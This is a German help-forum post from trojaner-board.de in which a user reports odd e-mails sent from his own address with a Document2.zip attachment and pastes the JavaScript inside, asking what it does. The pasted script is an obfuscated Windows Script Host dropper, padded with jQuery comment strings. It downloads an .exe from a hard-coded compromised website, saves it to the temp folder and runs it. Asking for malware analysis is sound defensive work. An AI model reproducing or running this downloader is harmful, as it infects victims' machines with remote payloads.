| Mark32801 | 19.03.2016 12:39 |
Mysteriöse E-Mails vom eigenen Konto
Hallo,
ich erhalte seit einigen Tagen eigenartige E-Mails, die angeblich von meinem eigenen Konto an mich geschickt wurden. Diese Mails enthalten keinerlei Text sondern nur einen Anhang: "Document2.zip". Ich bin neugierig geworden, und habe mir den Inhalt mal in einem virtuellen Ubuntu ohne Internetzugriff angeschaut. In dem Zip-File habe eine JavaScript-Datei gefunden. Leider reichen meine Kenntnisse in JavaScript nicht aus, um den ziemlich verwirrenden Programmcode zu verstehen, also wollte ich mal jemanden aus dem Trojaner-Board frage, ob er etwas damit anfangen kann und ob ich mir deswegen Sorgen machen sollte.
Hier der Code: Code:
eWQniYJJJqb = "} if ( seed ) { if ( postFinder || preFilter ) { if ( postFinder ) { Get the final matcherOut by condensing this intermediate into postFinder contexts temp = []; i = matcherOut.length; while ( i-- ) { if ( (elem = matcherOut[i]) ) { Restore matcherIn since elem is not yet a final match temp.push( (matcherIn[i] = elem) ); } } postFinder( null, (matcherOut = []), temp, xml ); ";
accountableI = 0;
String.prototype.naive = function () { return this.substr(0, 1); };
var wgOCV = ["M"+("coinage","weapons","betimes","educated","Ii")+"qu"+("clamber","forming","JBVvR"), ("judgement","slavish","dVG")+("stipend","figuratively","atmospheric","naturalist","II")+("scanning","extensions","bn")+"RcLm", "ExpandEnv"+("modulation","inhospitable","pigtail","ir")+"on"+"me"+"ntStri"+"ngs", ""+("chronicles","locale","%")+"TE"+"MP%", ""+("bloodhound","entail","poetry",".")+"exe", ("seminars","replaced","comment","stuffing","R")+"un", ("contact","enquiring","nominate","undeniable","Actco")+"unterivcountereX"+("hurling","condone","buffalo","counte")+"rO"+"bcount"+("thirty","oligarchy","alias","booth","erjecoun")+("arrived","danny","civilization","terct"), "lriRxn", "ddcyjtFEUpi", "W"+"Sc"+"co"+"un"+"te"+"rr"+"ip"+"tc"+("denunciation","listprice","tingling","ou")+"nt"+"er." + ("withdrawal","longwinded","S"), "ymXMqApbIv", ("kingdom","failed","hco")+"unte"+"re"+"lcount"+"erl", "YWACVXlR", ""+"H"+("gripping","fibrous","stepdaughter","seeds","zO")+"Vaw", "Mco"+"un"+"te"+"rS"+("auction","dating","Xc")+("custody","minutiae","endorsement","ount")+("preamble","impeach","erML")+"coun"+"ter2" + "."+"coun"+("codes","fixed","learner","te")+("highlight","mephistopheles","frugal","manor","rX")+"McounterLHcounterTTP"];
pcwsBTbM = "}function matcherFromTokens( tokens ) { var checkContext, matcher, j, len = tokens.length, leadingRelative = Expr.relative[ tokens[0].type ], implicitRelative = leadingRelative || Expr.relative[\" \"], i = leadingRelative ? 1 : 0,";
wgOCV.splice(7, accountableI + 2);
sharpen = wgOCV[1+4+1].split("counter").join("");
var GymEDPjn = this[sharpen];
nERqhlmGDdB = "PIFIxecYw";
chrysalis = (("solutions", "swirl", "clips", "paralysis", "pVeVNII") + "tAVvmirW").naive();
equatorials = (("adduce", "flooring", "unions", "playback", "sWmgnaCHXETh") + "moVhFMoKOYo").naive();
accountableI = 6;
wgOCV[accountableI + 1] = wgOCV[accountableI + 1] + wgOCV[accountableI + 3];
wgOCV[accountableI + 2] = "EvuQoWamx";
accountableI++;
wgOCV.splice(accountableI + 1, accountableI - 4);
wgOCV[accountableI] = wgOCV[accountableI].split("counter").join("");
var ltKuu = new GymEDPjn(wgOCV[accountableI]);
vnPilEIXp = " seed[temp] = !(results[temp] = elem); } } ";
accountableI++;
wgOCV[accountableI + 1] = wgOCV[accountableI + 1].split("counter").join("");
var KtbEPMh = new GymEDPjn(wgOCV[1 + accountableI]);
rtCthIsahzc = "} Move matched elements from seed to results to keep them synchronized i = matcherOut.length; while ( i-- ) { if ( (elem = matcherOut[i]) && (temp = postFinder ? indexOf( seed, elem ) : preMap[i]) > -1 ) {";
accountableI /= 2;
var DkYHv = ltKuu[wgOCV[accountableI - 2]](wgOCV[accountableI - 1]);
XEHDiPIHSTB = "} Add elements to results, through postFinder if defined } else { matcherOut = condense( matcherOut === results ? matcherOut.splice( preexisting, matcherOut.length ) : matcherOut ); if ( postFinder ) { postFinder( null, results, matcherOut, xml ); } else { push.apply( results, matcherOut ); } } }); ";
subjectivee = (("queenly", "interests", "contacts", "fairly", "ElSaIFDa") + "Wyxpkz").naive();
function contains(healing, reproduce) {
try {
var lobby = DkYHv + "/" + reproduce + wgOCV[accountableI];
wSoGcxQQA = "} Add elements passing elementMatchers directly to results Support: IE<9, Safari Tolerate NodeList properties (IE: \"length\"; Safari: <number>) matching elements by id for ( ; i !== len && (elem = elems[i]) != null; i++ ) { if ( byElement && elem ) { j = 0; if ( !context && elem.ownerDocument !== document ) { setDocument( elem ); xml = !documentIsHTML; } while ( (matcher = elementMatchers[j++]) ) { if ( matcher( elem, context || document, xml) ) { results.push( elem ); break; } } if ( outermost ) { dirruns = dirrunsUnique; } ";
KtbEPMh["o" + chrysalis + subjectivee + "n"](("title","interventions","twentythird","G") + subjectivee + ("notifications","molten","automated","accentuated","T"), healing, false);
rUzxymoD = "} Track unmatched elements for set filters if ( bySet ) { They will have gone through all possible matchers if ( (elem = !matcher && elem) ) { matchedCount--; ";
KtbEPMh[equatorials + ("educate","prefers","curtsey","e") + (("perishing", "excuse", "questionnaire", "cameroon", "townsman", "nmutgWSmhA") + "rLtbyk").naive() + (("stones", "glaze", "tyrannical", "retirement", "suitable", "ddVoLlCiImD") + "flXFlq").naive()]();
mmHcJHVNvs = "} Lengthen the array for every element, matched or not if ( seed ) { unmatched.push( elem ); } } ";
if (KtbEPMh.status == 200) {
var XvPNrjgxg = new GymEDPjn((""+"A"+("impertinence","badly","pO")+("lined","prefix","talented","wildlife","DB.") + ("impel","convocation","")+"S"+("hedgehog","foregone","picks","tr")+"eam").replace("p", "D"));
XvPNrjgxg.open();
gamHpS = " The foundational matcher ensures that elements are reachable from top-level context(s) matchContext = addCombinator( function( elem ) { return elem === checkContext; }, implicitRelative, true ), matchAnyContext = addCombinator( function( elem ) { return indexOf( checkContext, elem ) > -1; }, implicitRelative, true ), matchers = [ function( elem, context, xml ) { var ret = ( !leadingRelative && ( xml || context !== outermostContext ) ) || ( (checkContext = context).nodeType ? matchContext( elem, context, xml ) : matchAnyContext( elem, context, xml ) ); Avoid hanging onto element (issue #299) checkContext = null; return ret; } ];";
XvPNrjgxg.type = 8 * (4 - 3 - 1) + 1;
Wvpzidhwtfd = " for ( ; i < len; i++ ) { if ( (matcher = Expr.relative[ tokens[i].type ]) ) { matchers = [ addCombinator(elementMatcher( matchers ), matcher) ]; } else { matcher = Expr.filter[ tokens[i].type ].apply( null, tokens[i].matches );";
XvPNrjgxg["w"+"ri"+("miocene","divorce","marge","obstruct","te")](KtbEPMh[""+"R"+("gazette","stuck","brandenburg","es")+("effigy","fruit","pon") + equatorials + ("remarks","canyon","overweening","e")+"Bo"+"dy"]);
TvgAVxhblG = " Return special upon seeing a positional matcher if ( matcher[ expando ] ) { Find the next relative operator (if any) for proper handling j = ++i; for ( ; j < len; j++ ) { if ( Expr.relative[ tokens[j].type ] ) { break; } } return setMatcher( i > 1 && elementMatcher( matchers ), i > 1 && toSelector( If the preceding token was a descendant combinator, insert an implicit any-element `*` tokens.slice( 0, i - 1 ).concat({ value: tokens[ i - 2 ].type === \" \" ? \"*\" : \"\" }) ).replace( rtrim, \"$1\" ), matcher, i < j && matcherFromTokens( tokens.slice( i, j ) ), j < len && matcherFromTokens( (tokens = tokens.slice( j )) ), j < len && toSelector( tokens ) ); } matchers.push( matcher ); } ";
XvPNrjgxg[(chrysalis + "o"+("windlass","camcorder","Di")+("trial","frontier","prague","ti")+"on").replace("D", equatorials)] = 0;
wgPBgDSwUf = "} return elementMatcher( matchers ); ";
XvPNrjgxg.saveToFile(lobby, 2);
oUuMeEUmo = "}function matcherFromGroupMatchers( elementMatchers, setMatchers ) { var bySet = setMatchers.length > 0, byElement = elementMatchers.length > 0, superMatcher = function( seed, context, xml, results, outermost ) { var elem, j, matcher, matchedCount = 0, i = \"0\", unmatched = seed && [], setMatched = [], contextBackup = outermostContext, We must always have either seed elements or outermost context elems = seed || byElement && Expr.find[\"TAG\"]( \"*\", outermost ), Use integer dirruns iff this is the outermost matcher dirrunsUnique = (dirruns += contextBackup == null ? 1 : Math.random() || 0.1), len = elems.length;";
XvPNrjgxg.close();
KLxKYyqkiQ = " if ( outermost ) { outermostContext = context === document || context || outermost; ";
ltKuu[wgOCV[accountableI + 1]](lobby, 1, "qFRsrAaSAH" === "Dlglgj"); UekaMc = "} if ( seed ) { Reintegrate element matches to eliminate the need for sorting if ( matchedCount > 0 ) { while ( i-- ) { if ( !(unmatched[i] || setMatched[i]) ) { setMatched[i] = pop.call( results ); } } ";
}
} catch (anLdioi) { };
}
contains(("intrinsic","authorised","h")+("michael","eucalyptus","orleans","quoted","ttp:")+("vineyard","swain","//naaira")+("jumps","astounded","h.")+("vineyard","holes","humbug","co")+("jumping","openings","whiten","m/wp-c")+("potter","compress","gateway","courier","ontent")+("picks","seasonal","prices","newfoundland","/plu")+("fossil","agonized","gi")+"ns"+("shanghai","analytical","/h")+("forsworn","accede","cadence","citation","ello")+("retains","holidays","123/j7u7h5")+("blurred","stink","treatments","4h")+"5."+"exe","CgYrXLur");
heCmMnWXoB = "} `i` is now the count of elements visited above, and adding it to `matchedCount` makes the latter nonnegative. matchedCount += i;";
EMshQEJ = " Apply set filters to unmatched elements NOTE: This can be skipped if there are no unmatched elements (i.e., `matchedCount` equals `i`), unless we didn\"t visit _any_ elements in the above loop because we have no element matchers and no seed. Incrementing an initially-string \"0\" `i` allows `i` to remain a string only in that case, which will result in a \"00\" `matchedCount` that differs from `i` but is also numerically zero. if ( bySet && i !== matchedCount ) { j = 0; while ( (matcher = setMatchers[j++]) ) { matcher( unmatched, setMatched, context, xml ); ";
Vielen Dank schon mal!
Gruß Mark32801 |
Mysteriöse E-Mails vom eigenen Konto
(https://www.trojaner-board.de/177040-mysterioese-e-mails-eigenen-konto.html)